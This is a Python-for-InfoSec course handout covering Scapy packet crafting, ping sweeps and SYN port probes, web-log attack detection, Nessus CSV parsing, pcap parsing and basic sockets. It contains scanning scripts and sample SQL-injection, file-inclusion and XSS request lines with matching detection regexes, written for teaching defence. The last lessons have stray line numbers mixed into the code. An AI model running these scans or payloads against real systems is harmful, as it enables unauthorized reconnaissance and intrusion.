http://samsclass.info/124/proj11/proj17-scapy.html


- To run Scapy interactively

	sudo scapy


#####################################
# Sending ICMPv4 Packets with scapy #
#####################################

- In the Linux machine, in the Terminal window, at the >>> prompt, type this command, and then press the Enter key:

    i = IP()


- This creates an object named i of type IP. To see the properties of that object, use the display() method with this command:

    i.display()


- Use these commands to set the destination IP address and display the properties of the i object again. Replace the IP address in the first command with the IP address of your target Windows machine:

    i.dst="192.168.54.184"

    i.display()


- Notice that scapy automatically fills in your machine's source IP address.

- Use these commands to create an object named ic of type ICMP and display its properties:

    ic = ICMP()

    ic.display()


- Use this command to send the packet onto the network and listen for a single packet in response. Note that the third character is the numeral 1, not a lowercase L:

    sr1(i/ic)


- This command sends and receives one packet, of type IP at layer 3 and ICMP at layer 4.

- The Padding section shows the portion of the packet that carries higher-level data. In this case it contains only zeroes as padding.

- Use this command to send a packet that is IP at layer 3, ICMP at layer 4, and that contains data with your name in it (replace YOUR NAME with your own name):

    sr1(i/ic/"YOUR NAME")

- You should see a reply with a Raw section containing your name.



###################################
# Sending a UDP Packet with Scapy #
###################################

- Preparing the Target
$ ncat -ulvp 4444


--open another terminal--
In the Linux machine, in the Terminal window, at the >>> prompt, type these commands, and then press the Enter key:

    u = UDP()

    u.display()


- This creates an object named u of type UDP, and displays its properties.

- Execute these commands to change the destination port to 4444 and display the properties again:

    i.dst="192.168.54.184"				<--- replace this with a host that you can run netcat on (ex: another VM or your host computer)

    u.dport = 4444

    u.display()


- Execute this command to send the packet to the Windows machine:

    send(i/u/"YOUR NAME SENT VIA UDP\n")


- On the Windows target, you should see the message appear in the ncat window.


- A few more one-liners to try at the scapy prompt. Send a DNS query over UDP and wait for the single reply:

p = sr1(IP(dst="8.8.8.8")/UDP()/DNS(rd=1,qd=DNSQR(qname="strategicsec.com")))


- Send TCP SYN probes to several ports (or a single port) and collect the answers:

p=sr(IP(dst="192.168.230.2")/TCP(dport=[23,80,53,443]))

p=sr(IP(dst="192.168.230.2")/TCP(dport=[80]))


traceroute (["strategicsec.com"], maxttl=20)
	This is actually an ICMP & TCP traceroute, default destination is port 80

traceroute (["strategicsec.com"], dport=443, maxttl=20)


############################
# Ping Sweeping with Scapy #
############################

----------------------------------------------------------------------
vi scapy-pingsweep.py

#!/usr/bin/python
from scapy.all import *

TIMEOUT = 2        # seconds to wait for each echo reply
conf.verb = 0      # silence scapy's per-packet output
for ip in range(0, 256):
    packet = IP(dst="192.168.1." + str(ip), ttl=20)/ICMP()
    reply = sr1(packet, timeout=TIMEOUT)
    if reply is not None:
         # the reply's source is the host that answered (its dst is our own address)
         print reply.src, "is online"
    else:
         print "Timeout waiting for %s" % packet[IP].dst
----------------------------------------------------------------------


###############################################
# Checking out some scapy based port scanners #
###############################################

wget https://s3.amazonaws.com/SecureNinja/Python/rdp_scan.py

cat rdp_scan.py

sudo python rdp_scan.py 192.168.1.250


#########################################
# Here is the courseware for this month #
#########################################

Class powerpoint slides:
https://s3.amazonaws.com/StrategicSec-Files/Python/PythonV3-1.pptx


Courseware Lab Manual
https://s3.amazonaws.com/StrategicSec-Files/Python/Python-For-InfoSec-Pros-2015.pdf


https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
user:      infosecaddicts
pass:      infosecaddicts


The youtube video playlist that I'd like for you to watch is located here:
https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA


#####################
# Installing Python #
#####################

Windows
32-Bit Version
http://www.python.org/ftp/python/2.7.5/python-2.7.5.msi

64-Bit Version
http://www.python.org/ftp/python/2.7.5/python-2.7.5.amd64.msi

After you install Python in Windows the next thing you may want to install is IdleX:
http://idlex.sourceforge.net/features.html

Linux
Debian/Ubuntu:		sudo apt-get install -y python
RHEL/CentOS/Fedora:	sudo yum install -y python

After you install Python in Linux the next thing that you will need to do is install idle.

sudo apt-get install -y idle

Open IDLE, and let's just dive right in.


#############################
# Lesson 1: Simple Printing #
#############################

>>> print "Today we are learning Python."


#####################################
# Lesson 2: Simple Numbers and Math #
#####################################

>>> 2+2

>>> 6-3

>>> 18/7

>>> 18.0/7

>>> 18.0/7.0

>>> 18/7

>>> 9%4

>>> 8%4

>>> 8.75%.5

>>> 6.*7

>>> 6*6*6

>>> 6**3

>>> 5**12

>>> -5**4


#######################
# Lesson 3: Variables #
#######################

>>> x=18

>>> x+15

>>> x**3

>>> y=54

>>> x+y

>>> g=input("Enter number here: ")
	43

>>> g+32

>>> g**3


###################################
# Lesson 4: Modules and Functions #
###################################

>>> 5**4

>>> pow(5,4)

>>> abs(-18)

>>> abs(5)

>>> floor(18.7)

>>> import math

>>> math.floor(18.7)

>>> math.sqrt(81)

>>> joe = math.sqrt

>>> joe(9)

>>> joe=math.floor

>>> joe(19.8)


##################################
# Lesson 5: How to Save Programs #
##################################
Run "IDLE (Python GUI)"

File -> New Window

print "Python for InfoSec"

File -> Save as
	py4InfoSec.py

Run -> Run Module or Press "F5"


Create a file name.py

x = raw_input("Enter name: ")
print "Hey " + x
raw_input("Press<enter>")


Run -> Run Module or Press "F5"


#####################
# Lesson 6: Strings #
#####################

>>> "XSS"

>>> 'SQLi'

>>> "Joe's a python lover"

>>> 'Joe\'s a python lover'

>>> "Joe said \"InfoSec is fun\" to me"

>>> a = "Joe"

>>> b = "McCray"

>>> a, b

>>> a+b


##########################
# Lesson 7: More Strings #
##########################

>>> num = 10

>>> num + 2

>>> "The number of open ports found on this system is " + num

>>> num = str(18)

>>> "There are " + num + " vulnerabilities found in this environment."

>>> num2 = 46

>>> "As of 08/20/2012, the number of states that enacted the Security Breach Notification Law is " + `num2`


#######################
# Lesson 8: Raw Input #
#######################
Run "IDLE (Python GUI)"

File -> New Window

joemccray=input("Enter name: ")
print joemccray

Run -> Run Module				# Will throw an error
	or
Press "F5"

File -> New Window
joemccray=raw_input("Enter name: ")

Run -> Run Module				# Will throw an error
	or
Press "F5"

NOTE:
Use input() for integers and expressions, and use raw_input() when you are dealing with strings.


#################################
# Lesson 9: Sequences and Lists #
#################################

>>> attacks = ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']

>>> attacks
['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']

>>> attacks[3]
'SQL Injection'

>>> attacks[-2]
'Cross-Site Scripting'


###########################
# Lesson 10: If Statement #
###########################

Run "IDLE (Python GUI)"

File -> New Window
attack="SQLI"
if attack=="SQLI":
	print 'The attacker is using SQLI'


Run -> Run Module 	or 	Press "F5"

File -> New Window
attack="XSS"
if attack=="SQLI":
	print 'The attacker is using SQLI'


Run -> Run Module 	or 	Press "F5"


#############################
# Reference Videos To Watch #
#############################
Here is your first set of youtube videos that I'd like for you to watch:
https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 1-10)



####################################
# Lesson 11: Intro to Log Analysis #
####################################

Login to your StrategicSec Ubuntu machine. You can download the VM from the following link:

https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
user:      infosecaddicts
pass:      infosecaddicts

Then execute the following commands:
---------------------------------------------------------------------------------------------------------

NOTE: If you are still in your python interpreter then you must type exit() to get back to a regular command-prompt.

wget https://s3.amazonaws.com/SecureNinja/Python/access_log


cat access_log | grep 141.101.80.188

cat access_log | grep 141.101.80.187

cat access_log | grep 108.162.216.204

cat access_log | grep 173.245.53.160

---------------------------------------------------------

Google the following terms:
	- Python read file
	- Python read line
	- Python read from file



########################################################
# Lesson 12: Use Python to read in a file line by line #
########################################################

Reference:
http://cmdlinetips.com/2011/08/three-ways-to-read-a-text-file-line-by-line-in-python/


---------------------------------------------------------
vi logread1.py

## Open the file with read only permit
f = open('access_log', "r")

## use readlines to read all lines in the file
## The variable "lines" is a list containing all lines
lines = f.readlines()

print lines

## close the file after reading the lines.
f.close()

---------------------------------------------------------

Google the following:
	- python difference between readlines and readline
	- python readlines and readline


################################
# Lesson 13: A quick challenge #
################################

Can you write an if/then statement that looks for this IP and prints "Found it"?

141.101.81.187


---------------------------------------------------------
Hint 1: Use Python to look for a value in a list

Reference:
http://www.wellho.net/mouth/1789_Looking-for-a-value-in-a-list-Python.html


---------------------------------------------------------
Hint 2: Use Python to prompt for user input

Reference:
http://www.cyberciti.biz/faq/python-raw_input-examples/


---------------------------------------------------------
Hint 3: Use Python to search for a string in a list

Reference:
http://stackoverflow.com/questions/4843158/check-if-a-python-list-item-contains-a-string-inside-another-string


Here is my solution:
-------------------
$ python
>>> f = open('access_log', "r")
>>> lines = f.readlines()
>>> ip = '141.101.81.187'
>>> for string in lines:
...	if ip in string:
... 		print(string)


Here is one student's solution - can you please explain each line of this code to me?
-------------------------------------------------------------------------------------
#!/usr/bin/python

f = open('access_log')

strUsrinput = raw_input("Enter IP Address: ")

for line in iter(f):
    ip = line.split(" - ")[0]
    if ip == strUsrinput:
        print line

f.close()


-------------------------------

Working with another student after class we came up with another solution:

#!/usr/bin/env python

# This line opens the log file
f=open('access_log',"r")

# This line takes each line in the log file and stores it as an element in the list
lines = f.readlines()

# This line stores the IP that the user types as a var called userinput
userinput = raw_input("Enter the IP you want to search for: ")

# This combination for loop and nested if statement looks for the IP in the list called lines and prints the entire line if found.
for ip in lines:
    if ip.find(userinput) != -1:
        print ip


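One way to do the IP search from Lessons 12 and 13 with an exact match instead of a substring test, as an added Python 3 example (my code, not part of the course handout, which is written for Python 2): parse each combined-log line into fields first, then compare the client field as an IP address. The log lines are constructed; the course's access_log is not reproduced. A substring check like the `if ip in string` solution above also matches 141.101.81.1870 and an IP that only appears inside the request URI, which find_substring() below shows for comparison.

```python
import re
from ipaddress import ip_address

# Constructed sample in Apache combined-log format (not the course's access_log).
SAMPLE_LOG = """\
141.101.81.187 - - [10/Oct/2015:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 2326 "-" "Mozilla/5.0"
141.101.81.18 - - [10/Oct/2015:13:55:37 +0000] "GET /about HTTP/1.1" 200 512 "-" "curl/7.35.0"
10.0.3.15 - - [10/Oct/2015:13:55:38 +0000] "GET /?ref=141.101.81.187 HTTP/1.1" 200 99 "-" "Mozilla/5.0"
141.101.81.1870 - - [10/Oct/2015:13:55:39 +0000] "GET /x HTTP/1.1" 404 0 "-" "-"
this line is garbage and does not parse
"""

# client, ident, user, [time], "request", status, size  (the combined-log prefix)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)')


def parse_line(line):
    """Return a dict of fields for one combined-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_client(lines, wanted):
    """Lines whose *client* field equals `wanted` (exact IP compare, not substring)."""
    target = ip_address(wanted)   # raises ValueError on junk input instead of silently matching nothing
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue              # unparseable line: skip rather than crash on the whole file
        try:
            client = ip_address(rec["ip"])
        except ValueError:
            continue              # e.g. 141.101.81.1870 is not a valid address
        if client == target:
            hits.append(line.rstrip("\n"))
    return hits


def find_substring(lines, wanted):
    """The course's `if ip in string` approach, kept for comparison."""
    return [l.rstrip("\n") for l in lines if wanted in l]


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines(True)
    print("exact matches:    ", len(find_client(lines, "141.101.81.187")))
    print("substring matches:", len(find_substring(lines, "141.101.81.187")))
    for hit in find_client(lines, "141.101.81.187"):
        print("Found it:", hit)
```

Run on the real access_log by replacing SAMPLE_LOG with `open('access_log').readlines()`; the exact comparison is what you want when an IP is fed into a blocklist or a ticket, because one extra digit or a referrer parameter should not count as a hit.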
#################################################
# Lesson 14: Look for web attacks in a log file #
#################################################

In this lab we will look at the scan_log.py script, which scans an Apache web server log for common attack attempts.
Supported attacks:
1.	    SQL Injection
2.	    Local File Inclusion
3.	    Remote File Inclusion
4.	    Cross-Site Scripting


wget https://s3.amazonaws.com/SecureNinja/Python/scan_log.py

The usage for scan_log.py is simple.  You feed it an apache log file.

cat scan_log.py | less			(use your up/down arrow keys to look through the file)

Explain to me how this script works.


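The scan_log.py download is not reproduced in the handout, so here is the same idea as an added Python 3 example (my code, not the SecureNinja script): a small signature-based scanner for the four attack classes listed above. The log lines, addresses and signature list are constructed. It URL-decodes the request twice before matching so that encoded and double-encoded payloads are not missed, which is the usual gap in a grep over the raw log.

```python
import re
from urllib.parse import unquote_plus

# Constructed combined-log lines (not from the course's access_log); 203.0.113.0/24 and
# 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2015:14:01:01 +0000] "GET /index.php?id=1%20UNION%20SELECT%20username,password%20FROM%20users HTTP/1.1" 200 3211 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2015:14:01:02 +0000] "GET /download.php?file=../../../../etc/passwd HTTP/1.1" 200 1788 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Oct/2015:14:01:03 +0000] "GET /page.php?inc=http://198.51.100.7/x.txt HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Oct/2015:14:01:04 +0000] "GET /search.php?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 912 "-" "Mozilla/5.0"',
    '10.0.3.15 - - [10/Oct/2015:14:01:05 +0000] "GET /about HTTP/1.1" 200 512 "-" "curl/7.35.0"',
]

# (label, regex) pairs: a deliberately small, readable signature set for the four classes above.
SIGNATURES = [
    ("SQL Injection",
     re.compile(r"union\s+(all\s+)?select|'\s*or\s+'?\d|information_schema|;\s*drop\s", re.I)),
    ("Local File Inclusion",
     re.compile(r"\.\./|/etc/passwd|/proc/self/", re.I)),
    ("Remote File Inclusion",
     re.compile(r"[?&][\w\[\]]+=(https?|ftp)://", re.I)),
    ("Cross-Site Scripting",
     re.compile(r"<script|javascript:|on(error|load)\s*=|alert\(", re.I)),
]


def request_uri(line):
    """Pull the URI out of the quoted "METHOD URI PROTO" field; None if the line is malformed."""
    parts = line.split('"')
    if len(parts) < 3:
        return None
    req = parts[1].split(" ")
    return req[1] if len(req) >= 2 else None


def classify(uri):
    """Return the list of attack labels whose signature matches the decoded URI."""
    decoded = unquote_plus(unquote_plus(uri))   # decode twice: %253C -> %3C -> <
    return [label for label, rx in SIGNATURES if rx.search(decoded)]


def scan_log(lines):
    """Return (client_ip, label, uri) for every signature hit in the given log lines."""
    findings = []
    for line in lines:
        uri = request_uri(line)
        if not uri:
            continue
        client = line.split(" ", 1)[0]
        for label in classify(uri):
            findings.append((client, label, uri))
    return findings


if __name__ == "__main__":
    for client, label, uri in scan_log(SAMPLE_LOG):
        print("%-14s %-22s %s" % (client, label, uri))
```

To run it against the lab file, pass `open('access_log').read().splitlines()` to scan_log(). Signature lists like this produce false positives on legitimate traffic (a blog post that mentions "/etc/passwd", for instance), so treat the output as triage input, not as a verdict.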
################################
# Lesson 15: Parsing CSV Files #
################################

Dealing with csv files

Reference:
http://www.pythonforbeginners.com/systems-programming/using-the-csv-module-in-python/

Type the following commands:
---------------------------------------------------------------------------------------------------------

wget https://s3.amazonaws.com/SecureNinja/Python/class_nessus.csv


Example 1 - Reading CSV files
-----------------------------
#To be able to read csv formatted files, we will first have to import the
#csv module.

import csv
with open('class_nessus.csv', 'rb') as f:
    reader = csv.reader(f)
    for row in reader:
        print row


Example 2 - Reading CSV files
-----------------------------
vi readcsv.py

#!/usr/bin/python
import csv     				# imports the csv module
import sys      			# imports the sys module

f = open(sys.argv[1], 'rb') 		# opens the csv file
try:
    reader = csv.reader(f)  		# creates the reader object
    for row in reader:   		# iterates the rows of the file in order
        print row    			# prints each row
finally:
    f.close()      			# closing


Example 3 - Reading CSV files
-----------------------------
vi readcsv2.py

#!/usr/bin/python
# This program reads the csv file and displays its contents.

import csv

ifile  = open('class_nessus.csv', "rb")
reader = csv.reader(ifile)

rownum = 0
for row in reader:
    # Save header row.
    if rownum == 0:
        header = row
    else:
        colnum = 0
        for col in row:
            print '%-8s: %s' % (header[colnum], col)
            colnum += 1

    rownum += 1

ifile.close()


python readcsv2.py | less


/---------------------------------------------------/
--------------------PARSING CSV FILES----------------
/---------------------------------------------------/

-------------TASK 1------------
vi readcsv3.py

#!/usr/bin/python
import csv
f = open('class_nessus.csv', 'rb')
try:
    rownum = 0
    reader = csv.reader(f)
    for row in reader:
        # Save header row.
        if rownum == 0:
            header = row
        else:
            # column 3 is the Risk rating; print the High findings with host, protocol and port
            if row[3].lower() == 'high':
                print '%-1s: %s     %-1s: %s     %-1s: %s     %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6])
        rownum += 1
finally:
    f.close()


python readcsv3.py | less

-------------TASK 2------------
vi readcsv4.py

#!/usr/bin/python
import csv
f = open('class_nessus.csv', 'rb')
try:
    print '/---------------------------------------------------/'
    rownum = 0
    hosts = {}
    reader = csv.reader(f)
    for row in reader:
        # Save header row.
        if rownum == 0:
            header = row
        else:
            # print each host only once, the first time it shows up with a High finding
            if row[3].lower() == 'high' and row[4] not in hosts:
                hosts[row[4]] = row[4]
                print '%-1s: %s     %-1s: %s     %-1s: %s     %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6])
        rownum += 1
finally:
    f.close()


python readcsv4.py | less


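An added Python 3 example, not part of the handout, that does Task 1 and Task 2 with csv.DictReader so columns are addressed by name instead of by index (row[3], row[4] above). The CSV text is constructed to follow the Nessus export layout the tasks rely on (Risk in the fourth column, then Host, Protocol, Port); the plugin IDs, hosts, CVE placeholders and finding names are made up. It also shows two things the index-based versions miss: the Risk column is compared case-insensitively, and quoted names that contain commas are handled by the csv module rather than by splitting on commas.

```python
import csv
import io
from collections import Counter

# Constructed Nessus-style export (assumed column order: Plugin ID,CVE,CVSS,Risk,Host,Protocol,Port,Name).
# CVE values are placeholders, not real identifiers.
SAMPLE_CSV = """\
Plugin ID,CVE,CVSS,Risk,Host,Protocol,Port,Name
10000,CVE-0000-0001,10.0,High,192.168.1.10,tcp,445,"Sample SMB finding A"
10001,,5.0,Medium,192.168.1.10,tcp,80,"Web Server Directory Listing"
10002,CVE-0000-0002,9.3,high,192.168.1.20,tcp,3389,"Sample RDP finding, remote code execution"
10003,,0.0,None,192.168.1.30,tcp,22,"SSH Server Detection"
10004,CVE-0000-0001,10.0,High,192.168.1.10,tcp,139,"Sample SMB finding A"
"""


def read_findings(text):
    """Parse the export into a list of dicts keyed by the header row."""
    return list(csv.DictReader(io.StringIO(text)))


def findings_by_risk(text, risk="High"):
    """Task 1: every finding whose Risk column equals `risk` (case-insensitive, whitespace-tolerant)."""
    wanted = risk.strip().lower()
    return [r for r in read_findings(text) if r["Risk"].strip().lower() == wanted]


def hosts_by_high_count(text):
    """Task 2, extended: each host with a High finding, once, with how many High findings it has.
    Returns a list of (host, count) pairs, most findings first."""
    return Counter(r["Host"] for r in findings_by_risk(text, "High")).most_common()


def format_finding(r):
    """Same fields the course prints: Risk, Host, Protocol, Port (plus the Name)."""
    return "Risk: %-6s Host: %-14s Protocol: %-4s Port: %-5s %s" % (
        r["Risk"], r["Host"], r["Protocol"], r["Port"], r["Name"])


if __name__ == "__main__":
    print("--- Task 1: High findings ---")
    for r in findings_by_risk(SAMPLE_CSV):
        print(format_finding(r))
    print("--- Task 2: hosts with High findings ---")
    for host, n in hosts_by_high_count(SAMPLE_CSV):
        print("%-14s %d high-risk finding(s)" % (host, n))
```

For the real file, use `open('class_nessus.csv', newline='').read()` in place of SAMPLE_CSV; `newline=''` is what the csv module documents for files that may contain quoted multi-line fields such as Nessus plugin output.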
#################################################
# Lesson 16: Parsing Packets with Python's DPKT #
#################################################
The first thing that you will need to do is install dpkt.

sudo apt-get install -y python-dpkt


Now cd to your courseware directory, and then cd into the subfolder '2-PCAP-Parsing/Resources'.
Run tcpdump to capture a .pcap file that we will use for the next exercise


sudo tcpdump -ni eth0 -s0 -w quick.pcap


--open another command prompt--
wget http://packetlife.net/media/library/12/tcpdump.pdf


Let's do something simple:


vi quickpcap.py
--------------------------------------------------------

#!/usr/bin/python
import dpkt

# Simple script to read the timestamps in a pcap file
# Reference: http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-0-simple-example-how-to.html

f = open("quick.pcap","rb")
pcap = dpkt.pcap.Reader(f)

# each record yields the capture timestamp (seconds since the epoch) and the raw frame bytes
for ts, buf in pcap:
	print ts

f.close()


--------------------------------------------------------

Now let's run the script we just wrote


python quickpcap.py



How dpkt breaks down a packet:

Reference:
http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-1-dpkt-sub-modules.html

    src: the MAC address of SOURCE.
    dst: The MAC address of DESTINATION
    type: The protocol type of contained ethernet payload.

The allowed values are listed in the file "ethernet.py",
such as:
a) ETH_TYPE_IP: It means that the ethernet payload is IP layer data.
b) ETH_TYPE_IPX: Means that the ethernet payload is IPX layer data.


References:
http://stackoverflow.com/questions/6337878/parsing-pcap-files-with-dpkt-python



Capture a second pcap for the next script:

sudo tcpdump -ni eth0 -s0 -w capture-100.pcap


--open another command prompt--
wget http://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf



Ok - now let's have a look at pcapparsing.py
--------------------------------------------------------

import socket
import dpkt
import sys
f = open('capture-100.pcap','rb')
pcapReader = dpkt.pcap.Reader(f)

for ts,data in pcapReader:
    ether = dpkt.ethernet.Ethernet(data)
    if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise
    ip = ether.data
    tcp = ip.data
    src = socket.inet_ntoa(ip.src)
    srcport = tcp.sport
    dst = socket.inet_ntoa(ip.dst)
    dstport = tcp.dport
    print "src: %s (port : %s)-> dest: %s (port %s)" % (src,srcport ,dst,dstport)

f.close()

--------------------------------------------------------



OK - let's run it:
python pcapparsing.py



Running this script might throw an error like this:

Traceback (most recent call last):
  File "pcapparsing.py", line 9, in <module>
    if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise


If it does, it is just because your capture has something in it that the script didn't account for: a frame that is not IPv4 (ARP, IPv6), where the bare raise fires, or an IPv4 packet whose payload is not TCP (ICMP, UDP), which has no sport/dport.




Your homework for today...


Rewrite this pcapparsing.py so that it prints out the timestamp, the source and destination IP addresses, and the source and destination ports.




Your challenge is to fix the Traceback error


For reference, here is a live ARP sniffer that combines pcapy (capture) with dpkt (decoding):

#!/usr/bin/python

import pcapy
import dpkt
import sys
import socket
import struct

SINGLE_SHOT = False

# list all the network devices
pcapy.findalldevs()

iface = "eth0"
filter = "arp"
max_bytes = 1024
promiscuous = False
read_timeout = 100 # in milliseconds

pc = pcapy.open_live( iface, max_bytes, promiscuous, read_timeout )
pc.setfilter( filter )

# callback for received packets
def recv_pkts( hdr, data ):
    packet = dpkt.ethernet.Ethernet( data )

    print type( packet.data )
    print "ipsrc: %s, ipdst: %s" %( \
                 socket.inet_ntoa( packet.data.spa ), \
                 socket.inet_ntoa( packet.data.tpa ) )

    print "macsrc: %s, macdst: %s " % (
                "%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB",packet.data.sha),
                "%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB",packet.data.tha ) )

if SINGLE_SHOT:
    header, data = pc.next()
    sys.exit(0)
else:
    packet_limit = -1 # infinite
    pc.loop( packet_limit, recv_pkts ) # capture packets


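The homework and the Traceback challenge above, worked as an added Python 3 example (my code, not the course's pcapparsing.py): a stdlib-only parser for the classic pcap format that prints the timestamp, the IP addresses and the ports, skips frames that are not IPv4 instead of raising, and leaves the ports empty for ICMP. The capture is constructed in memory (addresses, ports and timestamps are made up) so it runs without tcpdump or dpkt; with dpkt the equivalent checks are `ether.type == dpkt.ethernet.ETH_TYPE_IP` and `isinstance(ip.data, (dpkt.tcp.TCP, dpkt.udp.UDP))`.

```python
import io
import socket
import struct

ETH_TYPE_IP = 0x0800
ETH_TYPE_ARP = 0x0806
IPPROTO_ICMP, IPPROTO_TCP, IPPROTO_UDP = 1, 6, 17


def parse_pcap(fileobj):
    """Return (timestamp, src_ip, src_port, dst_ip, dst_port, proto) for each IPv4 packet.
    Non-IPv4 frames are skipped rather than raised on; ICMP gets None for both ports."""
    gh = fileobj.read(24)   # global header: magic, version, tz, sigfigs, snaplen, linktype
    if len(gh) < 24:
        raise ValueError("truncated pcap global header")
    if gh[:4] == b"\xd4\xc3\xb2\xa1":
        endian = "<"
    elif gh[:4] == b"\xa1\xb2\xc3\xd4":
        endian = ">"
    else:
        raise ValueError("not a classic pcap file")
    results = []
    while True:
        rec = fileobj.read(16)   # per-record header: ts_sec, ts_usec, incl_len, orig_len
        if len(rec) < 16:
            break
        ts_sec, ts_usec, incl_len, _orig_len = struct.unpack(endian + "IIII", rec)
        frame = fileobj.read(incl_len)
        if len(frame) < incl_len:
            break                # truncated last record
        ts = ts_sec + ts_usec / 1e6
        if len(frame) < 14:
            continue
        eth_type = struct.unpack("!H", frame[12:14])[0]
        if eth_type != ETH_TYPE_IP:
            continue             # ARP, IPv6, VLAN, ...: the place the course script raised
        ip = frame[14:]
        if len(ip) < 20:
            continue
        ihl = (ip[0] & 0x0F) * 4 # header length in bytes (options make it > 20)
        proto = ip[9]
        src = socket.inet_ntoa(ip[12:16])
        dst = socket.inet_ntoa(ip[16:20])
        l4 = ip[ihl:]
        if proto in (IPPROTO_TCP, IPPROTO_UDP) and len(l4) >= 4:
            sport, dport = struct.unpack("!HH", l4[:4])   # both headers start with the ports
        else:
            sport = dport = None                          # ICMP and others carry no ports
        results.append((ts, src, sport, dst, dport, proto))
    return results


def _ipv4(proto, src, dst, payload):
    """Minimal IPv4 header (no options, zero checksum: the parser does not verify it)."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64, proto, 0,
                      socket.inet_aton(src), socket.inet_aton(dst))
    return hdr + payload


def _frame(eth_type, payload):
    """Ethernet frame with zeroed MAC addresses."""
    return b"\x00" * 12 + struct.pack("!H", eth_type) + payload


def build_sample_pcap():
    """Constructed capture: a TCP SYN, an ARP request, a UDP/53 datagram and an ICMP echo."""
    frames = [
        (1.0, _frame(ETH_TYPE_IP, _ipv4(IPPROTO_TCP, "10.0.3.15", "192.0.2.80",
                     struct.pack("!HHIIBBHHH", 40123, 80, 0, 0, 0x50, 0x02, 65535, 0, 0)))),
        (2.0, _frame(ETH_TYPE_ARP, b"\x00" * 28)),
        (3.0, _frame(ETH_TYPE_IP, _ipv4(IPPROTO_UDP, "10.0.3.15", "8.8.8.8",
                     struct.pack("!HHHH", 51000, 53, 8, 0)))),
        (4.5, _frame(ETH_TYPE_IP, _ipv4(IPPROTO_ICMP, "10.0.3.15", "192.0.2.1",
                     struct.pack("!BBHHH", 8, 0, 0, 1, 1)))),
    ]
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)   # little-endian, linktype 1 = Ethernet
    for ts, frame in frames:
        sec = int(ts)
        usec = int(round((ts - sec) * 1e6))
        out += struct.pack("<IIII", sec, usec, len(frame), len(frame)) + frame
    return out


def summarize(pcap_bytes):
    return parse_pcap(io.BytesIO(pcap_bytes))


if __name__ == "__main__":
    for ts, src, sport, dst, dport, proto in summarize(build_sample_pcap()):
        print("%.6f  %s:%s -> %s:%s  proto=%d" % (ts, src, sport, dst, dport, proto))
```

Point `parse_pcap(open('capture-100.pcap', 'rb'))` at the lab capture to use it on real traffic. Note the file is opened in binary mode, which the course script should do as well.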
#############################
# Reference Videos To Watch #
#############################
Here is your second set of youtube videos that I'd like for you to watch:
https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 11-20)



#############################################
# Lesson 17: Python Sockets & Port Scanning #
#############################################

$ ncat -l -v -p 1234


--open another terminal--
python

>>> import socket
>>> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
>>> s.connect(('localhost', 1234))
>>> s.send('Hello, world')
>>> data = s.recv(1024)
>>> s.close()

>>> print 'Received', data


########################################
1828
# Lesson 18: TCP Client and TCP Server #
1829
########################################
1830
1831
vi tcpclient.py
1832
1833
1834
1835
#!/usr/bin/python
1836
# tcpclient.py
1837
1838
import socket
1839
1840
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
1841
hostport = ("127.0.0.1", 1337)
1842
s.connect(hostport)
1843
s.send("Hello\n")
1844
buf = s.recv(1024)
1845
print "Received", buf
1846
1847
1848
1849
1850
1851
1852
1853
1854
1855
vi tcpserver.py
1856
1857
1858
1859
1860
1861
#!/usr/bin/python
1862
# tcpserver.py
1863
1864
import socket
1865
1866
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
1867
hostport = ("", 1337)
1868
s.bind(hostport)
1869
s.listen(10)
1870
while 1:
1871
	cli,addr = s.accept()
1872
	print "Connection from", addr
1873
	buf = cli.recv(1024)
1874
	print "Received", buf
1875
	if buf == "Hello\n":
1876
		cli.send("Server ID 1\n")
1877
	cli.close()
1878
1879
1880
1881
1882
1883
1884
1885
1886
python tcpserver.py
1887
1888
1889
--open another terminal--
1890
python tcpclient.py
1891
1892
1893
########################################
1894
# Lesson 19: UDP Client and UDP Server #
1895
########################################
1896
1897
vi udpclient.py
1898
1899
1900
1901
1902
1903
1904
#!/usr/bin/python
1905
# udpclient.py
1906
1907
import socket
1908
1909
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
1910
hostport = ("127.0.0.1", 1337)
1911
s.sendto("Hello\n", hostport)
1912
buf = s.recv(1024)
1913
print buf
1914
1915
1916
1917
1918
1919
1920
1921
1922
1923
vi udpserver.py
1924
1925
1926
1927
1928
1929
1930
#!/usr/bin/python
1931
# udpserver.py
1932
1933
import socket
1934
1935
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
1936
